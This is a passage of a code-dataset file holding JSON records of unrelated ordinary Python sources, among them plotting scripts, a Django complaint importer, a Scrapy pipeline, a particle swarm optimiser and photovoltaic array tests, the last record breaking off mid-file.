self.set_name(common.APPNAME)\n self.set_version(common.APPVERSION)\n self.set_copyright(common.COPYRIGHTS)\n self.set_logo(gtk.gdk.pixbuf_new_from_file(common.APP_HEADER))\n self.set_translator_credits(TRANSLATORS)\n self.set_license(common.LICENSE)\n self.set_website(common.WEBSITE)\n self.set_website_label(_(\"BillReminder Website\"))\n self.set_authors(common.AUTHORS)\n self.set_artists(common.ARTISTS)\n\n # Show all widgets\n self.show_all()\n","sub_path":"src/gui/aboutdialog.py","file_name":"aboutdialog.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"543518132","text":"\nimport matplotlib.pyplot as plt\nimport csv\nfrom datetime import datetime\n\n\nopen_file = open('sitka_weather_2018_simple.csv', 'r')\nfilename = open('death_valley_2018_simple.csv', 'r')\n\ncsv_file = csv.reader(open_file, delimiter = ',')\nfile = csv.reader(filename, delimiter = ',')\n\nheader_row = next(csv_file)\nheader = next(file)\n\nmydate = datetime.strptime('2018-07-01', '%Y-%m-%d')\nprint(type(mydate))\n\ndates = []\nhighs = []\nlows = []\n\n\ndates2 = []\nhighs2 = []\nlows2 = []\n\nfor row in csv_file:\n highs.append(int(row[5]))\n lows.append(int(row[6]))\n the_date = datetime.strptime(row[2], '%Y-%m-%d')\n dates.append(the_date)\n\nfor row in file:\n try:\n the_date = datetime.strptime(row[2], '%Y-%m-%d')\n high = int(row[4])\n low = int(row[5])\n except ValueError:\n print(f'Missing data for {the_date}')\n else:\n highs2.append(high)\n lows2.append(low)\n dates2.append(the_date)\n\n\nfig = plt.figure()\n\nplt.subplot(2,1,1)\nplt.tick_params(axis = \"both\", which = 'major', labelsize = 12)\nplt.plot(dates, highs, c = 'red', alpha = 0.5)\nplt.plot(dates, lows, c = 'blue', alpha = 0.5)\nplt.fill_between(dates, highs, lows, facecolor = 'blue', alpha = 0.1)\nplt.title('SITKA AIRPORT, AK US')\n\nplt.subplot(2,1,2)\nplt.tick_params(axis = \"both\", which = 'major', labelsize = 12)\nplt.plot(dates2, highs2, c = 'red', alpha = 0.5)\nplt.plot(dates2, lows2, c = 'blue', alpha = 0.5)\nplt.fill_between(dates2, highs2, lows2, facecolor = 'blue', alpha = 0.1)\nplt.title('DEATH VALLEY, CA US')\n\nplt.suptitle(\"Temperature comparison between SITKA AIRPORT, AK US and DEATH VALLEY, CA US\")\n\nfig.autofmt_xdate()\n\nplt.show()\n\n\n\n","sub_path":"sitka5.py","file_name":"sitka5.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286088391","text":"\r\nfrom laminate_analysis_1 import *\r\nfrom Lamina import Lamina\r\nfrom Laminate import Laminate\r\nfrom laminate_Tools import *\r\n\r\nif __name__ == \"__main__\":\r\n\tthick = 0.00272/12\r\n\tfv = 0.4705\r\n\tf = Fibre(23e10 ,15e9 , 24e9 ,vf12 = 0.279 ,density = 0 , Xt = 49e8 ,Xc = 441e7 ,\\\r\n\t\t\t\tYt = 0 ,Yc = 0 , S = 49e8 )\r\n\t\r\n\tm = Matrix(Em = 3e9 , Gm= 1.15e9 , vm = 0.3 ,density = 0 ,Xt = 70e6,Xc = 85e6 ,\\\r\n\t\t\t\tYt = 0 ,Yc = 0 , S = 45e6 )\r\n\r\n\ta0 = Lamina(angle = 0 ,thickness= thick )\r\n\ta0.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta0.Chamis_Model()\r\n\r\n\ta45 = Lamina(angle = 45 ,thickness= thick )\r\n\ta45.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta45.Chamis_Model()\r\n\r\n\ta_45 = Lamina(angle = -45 ,thickness= thick )\r\n\ta_45.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\ta_45.Chamis_Model()\r\n\r\n\tb30 = Lamina(angle = 30 ,thickness= thick )\r\n\tb30.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tb30.Chamis_Model()\r\n\r\n\tb_30 = Lamina(angle = -30 ,thickness= thick )\r\n\tb_30.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tb_30.Chamis_Model()\r\n\r\n\tc15 = Lamina(angle = 15 ,thickness= thick )\r\n\tc15.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tc15.Chamis_Model()\r\n\r\n\tc_15 = Lamina(angle = -15 ,thickness= thick )\r\n\tc_15.Fibre_Matrix_Lamina(fibre = f , matrix = m , fibre_volume = fv)\r\n\tc_15.Chamis_Model()\r\n\r\n\tLA = Laminate(degradation = 1e-9)\r\n\tLA.add_Lamina(a45)\r\n\tLA.add_Lamina(a_45)\r\n\r\n\tLA.add_Lamina(b30)\r\n\tLA.add_Lamina(b_30)\r\n\r\n\tLA.add_Lamina(c15)\r\n\tLA.add_Lamina(c_15)\r\n\tLA.add_Lamina(c_15)\r\n\tLA.add_Lamina(c15)\r\n\r\n\tLA.add_Lamina(b_30)\r\n\tLA.add_Lamina(b30)\r\n\r\n\tLA.add_Lamina(a_45)\r\n\tLA.add_Lamina(a45)\r\n\r\n\tLA.update()\r\n\r\n\tprint(LA.Ex ,LA.Ey )\r\n\r\n\tprint( a45.E1 , a45.E2 , a45.G12 , a45.v12 , a45.v21 )\r\n\tprint( a45.Xt , a45.Xc , a45.Yt , a45.Yc , a45.S )\r\n\tprint( a0.Xt , a0.Xc , a0.Yt , a0.Yc , a0.S )\r\n\r\n\t# Force = Loading(F = [419830 ,0 ,0 ,0 ,0, 0])\r\n\t# Force.apple_to(LA)\r\n\t\t\r\n\t# print( '\\n\\n',Force.laminate_stresses_xy)\r\n\r\n\tlaminate_step_failure(LA , F = [0 ,1 ,0 ,0 ,0, 0] ,layer_num = 5, ply = 1 ,\\\r\n\t\tMax_Load = 1e10 , display = 0,Fc = \"Tsai_Wu\")\r\n\r\n\tLA.update()\r\n\tprint(LA.Ex ,LA.Ey )\r\n\r\n\t# Criterion = Failure_Criterion()\r\n\t# Criterion.Tsai_Wu(Force)\r\n\t# print( Criterion.ret_list)\r\n\r\n\t# plot_stress(Force,max_ten = 0,mode = 'xy',mode2 = 'x')\r\n\t# plot_strain(Force,mode = 'xy',max_ten = None,mode2 = 'x')\r\n","sub_path":"code/Hand_Made_Chamis_Lamina_data.py","file_name":"Hand_Made_Chamis_Lamina_data.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"282285802","text":"\nfrom typing import List\nfrom app.models.discord import Discord\nfrom app.models.history import History, Plataform\nfrom app.models.risk_model import Risk\nfrom app.models.segment import Segment\nfrom app.services import discord_service, history_service\nfrom app.utils import discord_webhook\nfrom app.utils.downloadImage import downloader_file\nfrom app.utils.riskText import riskColor\ndef write_segments_risk(risk: Risk, segments: List[Segment], user: str):\n #Obtain Discord Webhooks\n item_discord = []\n for i_segment in segments:\n item_discord.extend(\n discord_service.get_by_segment(\n Discord(segment=i_segment.name, name=\"\", channel_webhook=\"\")\n )\n )\n if item_discord != []:\n #Prepare notification\n initResponse = riskColor(risk.risk)\n text='{} {} Reporte en: {}. '.format(initResponse,risk.detail,risk.site)\n # text_en = '{} {} Report from: {}. '.format(initResponse,risk.detail,risk.site)\n finalMessage= text + risk.gps\n for discord in item_discord:\n response = discord_webhook.send_message(discord.channel_webhook, finalMessage,risk.imageBinary, risk.imageContentType, risk.imageFilename)\n log = History()\n log.username_insert = user\n log.plataform = Plataform.discord\n log.request_payload = text\n log.response_code = response.status_code\n log.response_text = response.text\n log.image = risk.image\n log.activator = write_segments_risk.__name__\n history_service.create(log)","sub_path":"app/backgroud/risk_notify.py","file_name":"risk_notify.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"357294948","text":"class Node:\n def __init__(self, data, next):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def add_at_front(self, data):\n self.head = Node(data, self.head)\n\n def add_at_end(self, data):\n if not self.head:\n self.head = Node(data, None)\n return\n curr = self.head\n while curr.next:\n curr = curr.next\n curr.next = Node(data, None)\n\n def get_last_node(self):\n n = self.head\n while (n.next != None):\n n = n.next\n return n.data\n\n def is_empty(self):\n return self.head == None\n\n def print_list(self):\n n = self.head\n while n != None:\n print(n.data, end=\" => \")\n n = n.next\n print()\n\n\ns = LinkedList()\ns.add_at_front(5)\ns.add_at_end(8)\ns.add_at_front(9)\n\ns.print_list()\nprint(s.get_last_node())","sub_path":"Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"363634513","text":"# -*- coding: utf-8 -*-\nimport logging, datetime, re, os\n\nimport xlrd\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.utils.http import urlquote\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django import forms\n\nfrom settings import UPLOAD_PATH \nfrom models import Complaint\n\nimport util\nfrom util import *\n\n@login_required\ndef index(request):\n return render_to_response('iim/complaint_index.html',locals(),context_instance=RequestContext(request))\n\n@login_required\ndef get_list(request):\n queryset = Complaint.objects.all()\n return page_to_res(request, queryset)\n\n\n@login_required\ndef get(request,qid):\n obj = Complaint.objects.get(pk=qid)\n return info2json(obj, request)\n\n@login_required\ndef add(request):\n class Form(forms.ModelForm):\n class Meta:\n model = Complaint \n exclude = ('update_on','closed_on')\n form = Form(request.POST)\n if form.is_valid():\n complaint = form.save(commit=False)\n complaint.update_on = datetime.datetime.now()\n complaint.save()\n return info2json(complaint, request)\n else:\n return err2json(form.errors)\n\n#@permission_required_json('iim.delete_cqt')\n@login_required\ndef delete(request, qid):\n complaint = Complaint.objects.get(pk = qid)\n complaint.delete()\n ret = {\n 'success':True,\n }\n return HttpResponse(json.dumps(ret), mimetype='application/json')\n\n@csrf_exempt\n@login_required\ndef merge(request):\n if request.method == 'POST':\n f = request.FILES['complaint_file']\n data = f.read()\n f.close()\n wb = xlrd.open_workbook(file_contents=data)\n sh = wb.sheet_by_name('import')\n nr = sh.nrows\n logging.debug(nr)\n for i in xrange(1,nr):\n complaint = Complaint()\n order = sh.cell_value(rowx=i,colx=0)\n logging.debug(order)\n try:\n com = Complaint.objects.get(order = order) #防止投诉工单重复\n if sh.cell_value(rowx=i, colx=5):\n com.source = sh.cell_value(rowx=i, colx=7)\n com.closed_on = xlrd2date(sh.cell_value(rowx=i, colx=5))\n com.update_on = datetime.datetime.now()\n com.save()\n except Complaint.DoesNotExist:\n site_id = int(sh.cell_value(rowx=i, colx=1))\n try:\n PhysicalSite.objects.get(id = site_id) \n complaint.order = order\n complaint.site_id = site_id\n complaint.subject = sh.cell_value(rowx=i, colx=2)\n complaint.content = sh.cell_value(rowx=i, colx=3)\n complaint.create_on = xlrd2date(sh.cell_value(rowx=i, colx=4))\n complaint.closed_on = xlrd2date(sh.cell_value(rowx=i, colx=5))\n complaint.tech = sh.cell_value(rowx=i, colx=6)\n complaint.source = sh.cell_value(rowx=i, colx=7)\n complaint.update_on = datetime.datetime.now()\n complaint.save()\n except PhysicalSite.DoesNotExist: #未知站号略去\n pass\n ret = {\n 'success':True,\n }\n return HttpResponse(json.dumps(ret), mimetype='text/html')\n","sub_path":"iim/complaint.py","file_name":"complaint.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226950491","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read_file(name):\n return open(os.path.join(os.path.dirname(__file__), name)).read()\n\nreadme = read_file('README.txt')\ndoc = read_file(os.path.join('src', 'cykooz', 'title', 'title.txt'))\nchanges = read_file('CHANGES.txt')\n\nsetup(\n\tname='cykooz.title',\n\tversion='1.0.0',\n\tauthor='Cykooz',\n\tauthor_email='saikuz@mail.ru',\n\tdescription='Adapters for adapting any object to ITitle interface.',\n\tlong_description='\\n\\n'.join([readme, doc, changes]),\n\tlicense='ZPL',\n\tkeywords='zope3',\n\turl='https://bitbucket.org/cykooz/cykooz.title',\n\tclassifiers=[\n\t\t'Development Status :: 4 - Beta',\n\t\t'Environment :: Web Environment',\n\t\t'Intended Audience :: Developers',\n\t\t'Framework :: Zope3',\n\t\t'License :: OSI Approved :: Zope Public License',\n\t\t'Programming Language :: Python',\n\t\t'Natural Language :: English',\n\t\t'Operating System :: OS Independent',\n\t\t'Topic :: Internet :: WWW/HTTP'\n\t\t],\n\tpackages=find_packages('src'),\n\tinclude_package_data=True,\n\tpackage_dir={'':'src'},\n\tnamespace_packages=['cykooz'],\n\textras_require=dict(\n\t\ttest=[\n\t\t\t'zope.app.testing',\n\t\t\t],\n\t\t),\n\tinstall_requires=[\n\t\t'distribute',\n\t\t'zope.component',\n\t\t'zope.container',\n\t\t'zope.interface',\n\t\t'zope.dublincore',\n 'zope.i18n',\n\t\t'zope.i18nmessageid',\n\t\t],\n\tzip_safe=False,\n)\n","sub_path":"pypi_install_script/cykooz.title-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"232925524","text":"import numpy as np\r\nfrom function_rastrigin import error, grad_error\r\n\r\n\r\nclass Particle:\r\n\r\n def __init__(self, dim, minx, maxx):\r\n self.position = np.random.uniform(low=minx, high=maxx, size=dim)\r\n self.velocity = np.random.uniform(low=minx, high=maxx, size=dim)\r\n self.best_part_pos = self.position.copy()\r\n\r\n self.error = error(self.position)\r\n self.best_part_err = self.error.copy()\r\n\r\n def setPos(self, pos):\r\n self.position = pos\r\n self.error = error(pos)\r\n if self.error < self.best_part_err:\r\n self.best_part_err = self.error\r\n self.best_part_pos = pos\r\n\r\n\r\nclass PSO:\r\n w = 0.729\r\n c1 = 1.49445\r\n c2 = 1.49445\r\n lr = 0.01\r\n\r\n def __init__(self, dims, numOfBoids, numOfEpochs):\r\n self.swarm_list = [Particle(dims, -500, 500) for i in range(numOfBoids)]\r\n self.numOfEpochs = numOfEpochs\r\n\r\n self.best_swarm_position = np.random.uniform(low=-500, high=500, size=dims)\r\n self.best_swarm_error = 1e80 # Set high value to best swarm error\r\n\r\n def optimize(self):\r\n for i in range(self.numOfEpochs):\r\n\r\n for j in range(len(self.swarm_list)):\r\n\r\n current_particle = self.swarm_list[j] # get current particle\r\n\r\n Vcurr = grad_error(current_particle.position) # calculate current velocity of the particle\r\n\r\n deltaV = self.w * Vcurr \\\r\n + self.c1 * (current_particle.best_part_pos - current_particle.position) \\\r\n + self.c2 * (self.best_swarm_position - current_particle.position) # calculate delta V\r\n\r\n new_position = self.swarm_list[j].position - self.lr * deltaV # calculate the new position\r\n\r\n self.swarm_list[j].setPos(new_position) # update the position of particle\r\n\r\n if error(new_position) < self.best_swarm_error: # check the position if it's best for swarm\r\n self.best_swarm_position = new_position\r\n self.best_swarm_error = error(new_position)\r\n\r\n print('Epoch: {0} | Best position: [{1},{2}] | Best known error: {3}'.format(i,\r\n self.best_swarm_position[0],\r\n self.best_swarm_position[1],\r\n self.best_swarm_error))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pso = PSO(2, 30, 50)\r\n pso.optimize()","sub_path":"pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"411513200","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nimport time\nfrom itemadapter import ItemAdapter\nimport pymysql\nfrom twisted.enterprise import adbapi\nfrom .items import QpsItem, QpsCommentItem\n\n\nclass BasePipeline:\n def process_item(self, item, spider):\n crawl_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n item.update({\n 'spider_name': spider.name,\n 'crawl_time': crawl_time,\n 'update_time': crawl_time,\n })\n return item\n\n\nclass QpsPipeline:\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n def process_item(self, item, spider):\n \"\"\"\n 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象\n \"\"\"\n query = self.dbpool.runInteraction(self.do_insert, item)\n # 添加异常处理\n query.addCallback(self.handle_error)\n\n @classmethod\n def from_settings(cls, settings):\n \"\"\"\n 数据库建立连接\n :param settings: 配置参数\n :return: 实例化参数\n \"\"\"\n adbparams = dict(\n host=settings['MYSQL_HOST'],\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n password=settings['MYSQL_PASSWORD'],\n cursorclass=pymysql.cursors.DictCursor # 指定cursor类型\n )\n dbpool = adbapi.ConnectionPool('pymysql', **adbparams)\n return cls(dbpool)\n\n def do_insert(self, cursor, item):\n # 对数据库进行操作 不需要commit twisted 会自动commit\n if type(item) == QpsItem:\n self.insert_qipaoshui(cursor, item)\n elif type(item) == QpsCommentItem:\n self.insert_qipaoshui_comment(cursor, item)\n\n def insert_qipaoshui(self, cursor, item):\n insert_sql = \"\"\"\n insert into qipaoshui(name,good_id,url,spider_name,crawl_time,update_time) values (%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(\n insert_sql, (item['name'], item['good_id'],\n item['url'], item['spider_name'],\n item['crawl_time'], item['update_time']))\n\n def insert_qipaoshui_comment(self, cursor, item):\n insert_sql = \"\"\"\n insert into qipaoshui_comment(name,comment_info,good_id,comment_type,spider_name,crawl_time,update_time) \n values (%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(\n insert_sql,\n (item['name'], item['comment_info'], item['good_id'],\n item['comment_type'], item['spider_name'],\n item['crawl_time'], item['update_time'],))\n\n def handle_error(self, failure):\n # 异常处理\n if failure:\n # 打印错误信息\n print(failure)\n","sub_path":"week10/Qps/Qps/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"240185269","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\nimport serial\r\nimport pyqtgraph as pg\r\nimport threading\r\nfrom time import sleep\r\nimport sys\r\n\r\n\"\"\"\r\nReadMe:\r\n\r\n需要安装pyserial、pyqtgraph\r\nwindows用户在管理员模式下使用`py -m pip install pyserial pyqtgraph`命令即可\r\n\r\n使用方法\r\n方法1. 命令行。示例:`py myplot.pyw com3 9600`\r\n方法2. 修改源文件中78和79行的串口和波特率后,双击即可运行\r\n\r\n\"\"\"\r\n\r\n# 采用环形线性表结构\r\n# data_index指向data_list中最旧的数据\r\n# data_index-1指向data_list中最新的数据\r\nMax_count = 200 #页面最多显示的数据个数\r\ndata_list = [0] * 200#存放所有收到的数据\r\ndata_index = 0\r\ndata_t = [0.1*i for i in range(200)]\r\nisDrawing = False\r\nisRunning = True\r\n\r\napp = pg.mkQApp()\r\nwin = pg.GraphicsWindow()\r\nwin.setWindowTitle(u'python示波器')\r\np = win.addPlot()#win.addPlot()添加一个波形窗口,多次调用会将窗口分成多个界面\r\ncurve = p.plot()#为新的变量添加新的曲线\r\n#配置波形显示信息 \r\np.showGrid(x=True, y=True, alpha=0.5)\r\np.setLabels(left='voltage', bottom='t/ms', title='串口波形')#left纵坐标名 bottom横坐标名\r\n#设置坐标范围\r\np.setRange(yRange=(0,3))\r\n\r\n# 要改变界面显示的曲线,只需改变curve存储的数据即可\r\ndef addToDisplay():\r\n global isDrawing, data_list, data_index, data_t, Max_count, curve\r\n isDrawing = True\r\n _idx = data_index\r\n _data = []\r\n\r\n for i in range(_idx, _idx + Max_count):\r\n _data.append(data_list[i%Max_count]/256*3)\r\n\r\n isDrawing = False\r\n curve.setData(data_t, _data)\r\n \r\n\r\n \r\ndef ComRecvDeal(com, baud, readtime):\r\n global isDrawing, isRunning, data_list, data_index, Max_count\r\n \r\n try:\r\n tty = serial.Serial(com, baud, timeout=readtime)\r\n except:\r\n print(\"串口 \" + com + \" 打开失败\")\r\n sys.exit()\r\n\r\n tty.flushInput() #先清空一下缓冲区\r\n while isRunning:\r\n if not isDrawing:\r\n ch = tty.read()\r\n\t\t\t#判断是否读取到字节\r\n if ch:\r\n num = ord(ch) # 转为数字\r\n\t\t\t\t# 更新环形线性表\r\n data_index = (data_index - 1) % Max_count\r\n data_list[data_index] = num\r\n tty.close() \r\n\r\nif __name__ == \"__main__\":\r\n com = \"com4\"\r\n baud = 9600\r\n readtime = 0.1\r\n if len(sys.argv) > 2:\r\n com = sys.argv[1]\r\n baud = sys.argv[2]\r\n\r\n th = threading.Thread(target=ComRecvDeal, args=(com, baud, readtime))#创建串口接收线程\r\n th.start()\r\n timer = pg.QtCore.QTimer()\r\n timer.timeout.connect(addToDisplay) #定时刷新数据显示\r\n timer.start(10)\r\n try:\r\n sys.exit(app.exec_()) \r\n except:\r\n print(\"Program End.\")\r\n finally:\r\n timer.stop()\r\n isRunning = False\r\n th.join()\r\n","sub_path":"SerialPlot.py","file_name":"SerialPlot.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"410062800","text":"import os\nimport numpy as np\nfrom pvfactors.geometry import OrderedPVArray, PVGround, PVSurface\nfrom pvfactors.geometry.utils import contains\nfrom pvfactors.config import MAX_X_GROUND, MIN_X_GROUND\nfrom pvfactors.tests.test_geometry.test_data import \\\n vm_flat_orderedpvarray, vm_right_orderedpvarray\n\n\ndef test_ordered_pvarray_from_dict(params):\n \"\"\"Test that can successfully create ordered pvarray from parameters dict,\n and that the axis azimuth convention works correctly (via normal vector)\n \"\"\"\n pvarray = OrderedPVArray.from_dict(params)\n\n # Test that ground is created successfully\n assert isinstance(pvarray.ground, PVGround)\n assert pvarray.ground.length == (MAX_X_GROUND - MIN_X_GROUND)\n\n # Test the front and back sides\n assert len(pvarray.pvrows) == 3\n np.testing.assert_array_equal(\n pvarray.pvrows[0].front.n_vector, -pvarray.pvrows[0].back.n_vector)\n assert pvarray.pvrows[0].front.shaded_length == 0\n assert pvarray.gcr == params['gcr']\n assert pvarray.surface_tilt == params['surface_tilt']\n assert pvarray.surface_azimuth == params['surface_azimuth']\n assert pvarray.solar_zenith == params['solar_zenith']\n assert pvarray.solar_azimuth == params['solar_azimuth']\n assert pvarray.pvrows[0].front.n_vector[0] > 0\n\n # Orient the array the other way\n params.update({'surface_azimuth': 270.})\n pvarray = OrderedPVArray.from_dict(params)\n assert pvarray.pvrows[0].front.n_vector[0] < 0\n\n\ndef test_plot_ordered_pvarray():\n \"\"\"Test that ordered pv array plotting works correctly\"\"\"\n is_ci = os.environ.get('CI', False)\n if not is_ci:\n import matplotlib.pyplot as plt\n\n # Create base params\n params = {\n 'n_pvrows': 3,\n 'pvrow_height': 2.5,\n 'pvrow_width': 2.,\n 'surface_azimuth': 90., # east oriented modules / point right\n 'axis_azimuth': 0., # axis of rotation towards North\n 'surface_tilt': 20.,\n 'gcr': 0.4,\n 'solar_zenith': 20.,\n 'solar_azimuth': 90., # sun located in the east\n 'rho_ground': 0.2,\n 'rho_front_pvrow': 0.01,\n 'rho_back_pvrow': 0.03\n }\n\n # Plot simple ordered pv array\n ordered_pvarray = OrderedPVArray.from_dict(params)\n f, ax = plt.subplots()\n ordered_pvarray.plot(ax)\n plt.show()\n\n # Plot discretized ordered pv array\n params.update({'cut': {0: {'front': 5}, 1: {'back': 3}},\n 'surface_azimuth': 270.}) # point left\n ordered_pvarray = OrderedPVArray.from_dict(params)\n f, ax = plt.subplots()\n ordered_pvarray.plot(ax)\n plt.show()\n\n\ndef test_discretization_ordered_pvarray(discr_params):\n pvarray = OrderedPVArray.from_dict(discr_params)\n pvrows = pvarray.pvrows\n\n assert len(pvrows[0].front.list_segments) == 5\n assert len(pvrows[0].back.list_segments) == 1\n assert len(pvrows[1].back.list_segments) == 3\n\n\ndef test_ordered_pvarray_gnd_shadow_casting(params):\n \"\"\"Test shadow casting on ground, no inter-row shading\"\"\"\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 3\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 4\n assert ordered_pvarray.ground.shaded_length == 6.385066634855475\n assert ordered_pvarray.illum_side == 'front'\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_right(params_direct_shading):\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_left(params_direct_shading):\n\n params_direct_shading.update({'solar_azimuth': 270,\n 'surface_azimuth': 270})\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_back(params_direct_shading):\n\n params_direct_shading.update({'solar_azimuth': 270,\n 'surface_tilt': 120})\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n assert ordered_pvarray.illum_side == 'back'\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n # Shading length should be identical as in previous test for front surface,\n # but now with back surface\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_right_n_seg(\n params_direct_shading):\n\n params_direct_shading.update({'cut': {1: {'front': 7}}})\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n # Test pvrow sides: should be the same as without segments\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n\n # Test individual segments\n center_row = 